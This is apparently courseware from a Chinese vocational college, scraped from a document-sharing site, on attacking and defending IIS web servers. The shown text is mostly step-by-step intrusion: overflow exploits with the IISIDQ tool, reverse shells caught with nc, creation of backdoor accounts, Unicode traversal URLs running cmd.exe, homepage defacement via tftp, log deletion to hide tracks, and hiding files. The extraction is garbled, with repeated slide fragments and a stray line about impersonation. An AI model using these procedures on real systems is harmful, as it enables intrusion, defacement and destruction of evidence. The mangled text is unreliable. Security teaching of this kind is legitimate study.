學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器課件_第1頁
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器課件_第2頁
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器課件_第3頁
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器課件_第4頁
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器課件_第5頁
已閱讀5頁,還剩24頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認(rèn)領(lǐng)

文檔簡介

學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護任務(wù)一Web服務(wù)器的入侵與防護

課程負(fù)責(zé)人:楊文虎濟南鐵道職業(yè)技術(shù)學(xué)院信息工程系課程負(fù)責(zé)人:楊文虎濟南鐵道職業(yè)技術(shù)學(xué)院信息工程系3.1Web服務(wù)器的入侵與防護教學(xué)的實施過程任務(wù)規(guī)劃學(xué)生探究師生析疑完成任務(wù)檢查評測綜合創(chuàng)新思考、探討完成任務(wù)需要的相關(guān)資料,搜集資料,制定工作計劃

明確需要完成的工作任務(wù);教師進行點評、確定最終的實施方法;對技術(shù)問題進行講授和答疑。學(xué)生進入網(wǎng)絡(luò)實訓(xùn)室,根據(jù)工作計劃完成每個工作項目,完成每個項目實施日志和心得總結(jié)

學(xué)生分攻防角色相互檢查任務(wù)完成情況,分析不足,給出評價;教師對學(xué)生的日志和總結(jié)進行分析,給出評價。探索更多的Web服務(wù)器的應(yīng)用與防護的方法,搜索相關(guān)技術(shù),并在實訓(xùn)室中進行驗證。3.1Web服務(wù)器的入侵與防護教學(xué)的實施過程任務(wù)規(guī)劃學(xué)生探究主要的IIS漏洞有那些?其攻防技巧各有何特點?掌握.ida&.idq漏洞技術(shù)的攻防技巧了解Printer漏洞,掌握Unicode漏洞的入侵方式防護策略;了解asp映射分塊編碼漏洞、Webdav漏洞的入侵方式防護策略。問題引領(lǐng)3.1Web服務(wù)器的入侵與防護主要的IIS漏洞有那些?其攻防技巧各有何特點?問題引領(lǐng)3.1項目一、.ida&.idq漏洞攻防分析

Web服務(wù)器的入侵分為基于認(rèn)證的入侵和基于漏洞攻擊的入侵,基于認(rèn)證的入侵包括以下常見的手段:IPC$入侵、遠(yuǎn)程管理計算機、Telnet入侵、遠(yuǎn)程命令的執(zhí)行及進程查殺注冊表的入侵、暴力破解密碼等?;诼┒垂艚鼛啄瓯容^流行,黑客是信息時代的完美主義者,他們通過研究、試驗、編寫測試代碼來發(fā)現(xiàn)遠(yuǎn)程服務(wù)器中的漏洞,通過利用遠(yuǎn)程服務(wù)器的漏洞,可以繞過系統(tǒng)的認(rèn)證直接進入系統(tǒng)內(nèi)部。常用的漏洞包括:IIS漏洞、操作系統(tǒng)漏洞、SQL服務(wù)器漏洞IIS(InternetInformationServer),即Internet信息服務(wù)器,它在Windows系統(tǒng)中提供Internet服務(wù),例如提供Web服務(wù)、FTP服務(wù)、SMTP服務(wù),IIS服務(wù)器在方便用戶使用的同時,帶來了許多安全隱患。IIS漏洞有近千余種,其中能被用來入侵的漏洞大多數(shù)屬于“溢出”型漏洞。對于溢出型漏洞,入侵者可以通過發(fā)送特定指令格式的數(shù)據(jù)使遠(yuǎn)程服務(wù)區(qū)的緩沖區(qū)溢出,從而突破系統(tǒng)的保護,在溢出的空間中執(zhí)行任意指令。主要的IIS漏洞有:.ida&.idq漏洞、Printer漏洞、Unicode漏洞、.asp映射分塊編碼漏洞、Webdav漏洞IIS漏洞信息的搜集主要使用掃描軟件掃描存在漏洞的主機,例如使用X-Scan進行IIS漏洞的掃描,使用telnettargetIP80搜集Web服務(wù)器版本信息。

3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析Web服務(wù)器項目一、.ida&.idq漏洞攻防分析

對于.ida&.idq漏洞,微軟的IndexServer可以加快Web的搜索能力,提供對管理員腳本和Internet數(shù)據(jù)的查詢,默認(rèn)支持管理腳本.ida和查詢腳本.idq。管理腳本.ida和查詢腳本.idq都是使用idq.dll來進行解析的idq.dll存在一個緩沖溢出,問題存在于idq.dll擴展程序上,由于沒有對用戶提交的輸入?yún)?shù)進行邊界檢查,可以導(dǎo)致遠(yuǎn)程攻擊者利用溢出來獲得System權(quán)限訪問遠(yuǎn)程系統(tǒng)。關(guān)于.ida&.idq漏洞的檢測主要使用X-Scan、Sfind等檢測工具,手工檢測:在地址欄中輸入http://targetIP/*.ida或者h(yuǎn)ttp://targetIP/*.idq3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析對于.ida項目一、.ida&.idq漏洞攻防分析

IDQ入侵工具IISIDQIISIDQ有命令行和圖形界面兩種方式。使用IISIDQ攻擊遠(yuǎn)程服務(wù)器后,有兩種登錄方式:一是攻擊后主動連接方式命令iisidq.exe<操作系統(tǒng)類型><目標(biāo)IP><Web端口><1><端口監(jiān)聽端口>[輸入命令1];二是攻擊后監(jiān)聽遠(yuǎn)程服務(wù)器連接命令iisidq.exe<操作系統(tǒng)類型><目標(biāo)IP><Web端口><2><溢出連接IP><溢出連接端口>[輸入命令1]如果不寫輸入命令,默認(rèn)命令為cmd.exe/c+dir。如果使用,表示不使用默認(rèn)命令而是要用戶輸入命令。IISIDQ支持的操作系統(tǒng)類型如下所示:0IIS5中文Win2000Sp0,1IIS5中文Win2000Sp1,2IIS5中文Win2000Sp2idq3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析IDQ入侵工具IIS項目一、.ida&.idq漏洞攻防分析

漏洞溢出連接工具-NCnc在網(wǎng)絡(luò)工具中有“瑞士軍刀”的美譽,通過nc,入侵者可以方便的連接遠(yuǎn)程服務(wù)器.nc有兩種方法進行連接:主動連接到外部:nc[-options]hostnameport[s][ports],監(jiān)聽等待外部連接:nc–l–pport[-option][hostname][port]NC使用的參數(shù)說明:-e:prog程序重定向,一旦連接,就執(zhí)行-g:網(wǎng)關(guān)路由跳數(shù),可設(shè)置到8-h:幫助信息-i:secs延時的間隔-l:監(jiān)聽模式,用于入站連接-n:指定數(shù)字的IP地址,不能用hostname-o:file記錄16進制的傳輸-p:port本地端口號-r:任意指定本地及遠(yuǎn)程端口-s:addr本地源地址-u:UDP模式-v:詳細(xì)輸出(用兩個-v可得到更詳細(xì)的內(nèi)容)-w:secs超時時間-z:將輸入輸出關(guān)掉——用于掃描時3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析漏洞溢出連接工具-N項目一、.ida&.idq漏洞攻防分析

下面我們來看幾個入侵實例.idq入侵實例1步驟一:掃描遠(yuǎn)程服務(wù)器步驟二:IDQ溢出。使用連接方式一進行idq漏洞溢出。使用的命令為iisidq0068015213.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析下面我們來看項目一、.ida&.idq漏洞攻防分析

步驟三:使用nc進行連接。使用命令nc–v06521。3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析步驟三:使用nc進行項目一、.ida&.idq漏洞攻防分析

步驟四:建立后門帳號步驟五:使用exit命令斷開連接,比較命令如圖所示3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析步驟四:建立后門帳號項目一、.ida&.idq漏洞攻防分析

.idq入侵實例2步驟一:掃描遠(yuǎn)程服務(wù)器步驟二:使用nc在本地打開端口等待連接。使用命令nc-l–p250。參數(shù)-l表示使用監(jiān)聽模式,-p表示設(shè)置本地監(jiān)聽端口2503.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析.idq入侵實例23項目一、.ida&.idq漏洞攻防分析

步驟三:IDQ溢出。使用命令iisidq006802002501采用方式二進行溢出,使遠(yuǎn)程服務(wù)器溢出后自動連接到本地計算機的250端口3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析步驟三:IDQ溢出項目一、.ida&.idq漏洞攻防分析

步驟四:進行溢出后的攻擊步驟五:建立后門帳號步驟六:使用exit命令斷開連接3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析步驟四:進行項目一、.ida&.idq漏洞攻防分析

IISIDQ的圖形界面3.1Web服務(wù)器的入侵與防護項目一、.ida&.idq漏洞攻防分析IISIDQ3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析技術(shù)支持假冒的缺點之一是這個假冒是在太常見了。公司已經(jīng)意識到這種假冒技巧并要求防范。另一種技巧是第三方假冒,它能夠更成功的獲取內(nèi)部信息。

.printer漏洞windows2000IIS5存在打印擴展ISAPI(InternetServiceApplicationProgrammingInterface),使得.printer擴展與msw3prt.dll進行映射,該擴展可以通過Web調(diào)用打印機。在msw3prt.dll中存在緩沖區(qū)溢出漏洞,微軟建議,一般在未打補丁之前,一定要移除ISAPI網(wǎng)絡(luò)打印的映射。步驟一:使用nc監(jiān)聽端口步驟二:使用IIS5Exploit進行漏洞溢出,命令格式IIS5Exploit<目標(biāo)IP><入侵者IP><本地監(jiān)聽端口>3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析Unicode目錄遍歷漏洞微軟IIS4.0和5.0都存在利用擴展Unicode字符取代“/”和“\”,從而可以利用“../”目錄遍歷的漏洞,該漏洞帳號默認(rèn)情況下屬于Everyone和Users組的成員,因此任何與Web根目錄在同一邏輯分區(qū)上的能被這些組訪問的文件都能被刪除,修改或執(zhí)行。入侵者不能像使用.ida和.idq漏洞那樣,直接溢出一個擁有管理員權(quán)限的shell,而只是具有IUSR_machinename權(quán)限,也就是說,只能進行簡單的文件操作。使用Unicode構(gòu)造“/”和“\”字符舉例%c1%1c—>(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’%c0%2f—>(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析手工檢測漏洞我們要使用遠(yuǎn)程系統(tǒng)Windows2000server中文版,在地址欄輸入:06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\”3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析命令說明:命令中的“+”,代表空格,06遠(yuǎn)程服務(wù)器IP地址,scripts為遠(yuǎn)程服務(wù)器上的腳本文件目錄,“..%c1%1c..”被遠(yuǎn)程服務(wù)器譯為“../”,winnt/system32/cmd.exe?/c+打開遠(yuǎn)程服務(wù)器的cmd.exe,一般不用改變,dir+c:\入侵者要執(zhí)行的命令,利用此命令,入侵者將IE編程了遠(yuǎn)程命令的控制臺。

Unicode入侵實例—:涂鴉主頁步驟一:準(zhǔn)備標(biāo)語主頁,并保存成index.htm步驟二:探知遠(yuǎn)程服務(wù)器的Web根目錄方法一:利用.ida或者.idq漏洞。方法二:輸入06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\mmc.gif/s其中,/s表示在dir命令后查找指定文件或文件夾的物理路徑,mmc.gif是默認(rèn)安裝在Web根目錄中的,找到該文件的同時,也就找到了Web根目錄。3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析步驟三:涂鴉主頁。在地址欄中使用Unicode漏洞查詢Web服務(wù)器主頁,假設(shè)是index.htm。使用tftp將自己做好的主頁替換掉原Web服務(wù)器的主頁。tftp的使用tftp只要執(zhí)行tftpd32.exe,本計算機就成為一臺tftp服務(wù)器,使用windows自帶的tftp命令便可以在該服務(wù)器上傳和下載文件。使用方法:tftp[-i]host[GET/PUT]source[destination]-I 二進制文件傳輸host tftp服務(wù)器地址Get 下載文件PUT 上傳文件Source 文件名Destination 目的地3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞的實例二:擦腳印通過Unicode漏洞進入遠(yuǎn)程服務(wù)器后,肯定會在該服務(wù)器上留下自己的ip,為了隱藏自己,通常需要清除服務(wù)器的日志,這種做法叫作擦腳印。Del+c:\winnt\system32\logfiles\*.*Del+c:\winnt\system32\confige\*.evtDel+c:\winnt\system32\dtclog\*.*Del+c:\winnt\system32\*.logDel+c:\winnt\system32\*.txtDel+c:\winnt\*.txtDel+c:\winnt\*.logUnicode獲得的權(quán)限較低,一般無法執(zhí)行bat文件3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞實例三:修改文件屬性入侵過程中,入侵者通常希望隱藏自己的文件。如果上傳的文件設(shè)置成“隱藏”加“系統(tǒng)”屬性,就可以避免被發(fā)現(xiàn)。Attrib命令的使用:Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]filename][/S/D]+:設(shè)置屬性-:清除屬性R:只讀文件屬性A:存檔文件屬性S:系統(tǒng)文件屬性H:隱藏文件屬性/S:處理當(dāng)前文件夾及其子文件夾中的匹配文件/D:處理文件夾。如果要把c盤中的abc.exe設(shè)置成“系統(tǒng)”加“隱藏”屬性,使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中,“%2b”表示“+”號,類似,要取消掉隱藏和系統(tǒng)屬性,使用命令“attrib.exe+-H+-S+c:\abc.exe”。3.1Web服務(wù)器的入侵與防護項目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護項目三、.asp映射分塊編碼漏洞、Webdav攻防分析

.ASP映射分塊編碼漏洞Windows2000和NT4IIS.asp映射存在遠(yuǎn)程緩沖溢出漏洞。ASPISAPI過濾器默認(rèn)在所有NT4和WIN2000系統(tǒng)中裝載,存在的漏洞可以導(dǎo)致遠(yuǎn)程執(zhí)行任意命令。惡意攻擊者可以使用分塊編碼形式數(shù)據(jù)給IIS服務(wù)器,當(dāng)解碼和解析這些數(shù)據(jù)的時候可以強迫IIS把入侵者提供的數(shù)據(jù)寫到內(nèi)存任意位置。通過此漏洞可以導(dǎo)致WIN2000系統(tǒng)產(chǎn)生緩沖溢出并以IWAM_computer_name用戶的權(quán)限執(zhí)行任意代碼,而在WINDOWS

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論